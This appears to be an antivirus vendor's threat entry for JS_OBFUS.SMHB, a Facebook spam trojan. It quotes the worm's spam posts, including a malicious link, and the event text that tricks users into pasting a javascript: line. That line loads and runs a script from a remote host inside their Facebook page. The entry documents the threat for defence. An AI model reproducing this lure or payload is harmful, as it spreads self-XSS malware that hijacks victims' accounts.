JS_OBFUS.SMHB

This malicious script posts spam messages on Facebook.

It may also create an event with certain instructions. Doing the instructions may download and execute a similar JavaScript also detected as JS_OBFUS.SMHB.

This Trojan may arrive bundled with malware packages as a malware component. It may be hosted on a website and run when a user accesses the said website.

Arrival Details

This Trojan may arrive bundled with malware packages as a malware component.

It may be hosted on a website and run when a user accesses the said website.

NOTES:

This malicious script posts spam messages on Facebook such as:

"guys i just found an exploit for getting 500 free facebook credits :))"
"oomg i forgot to post the link, here it is http://3x2f6.sdam23.info//?f3jhq"
"wow just got my new facebook digit number, go activate yours and call me! :))
{BLOCKED}by.{BLOCKED}o5.info//?f2l3w

It may also create an event with the following message:

"Hey Guys, Facebook is now giving out (beta) phone numbers for their users. I just got mine :)
To get yours
Just follow these 3 steps:

Copy the following javascript code (highlight and press CTRL-C):
javascript:(activation=(facebookdigits=document).createElement('script').src='//{BLOCKED}5u.{BLOCKED}33.info//e.js?'+Math.random(),facebookdigits.body.appendChild(activation);void(0)

If you are having trouble with these instructions, try viewing the instructions here:
http://{BLOCKED}5u.dfds33.info/ it's where I learned it"

When the user clicks the URL, it shows the following page:

Doing the instructions may download and execute a similar JavaScript also detected as JS_OBFUS.SMHB.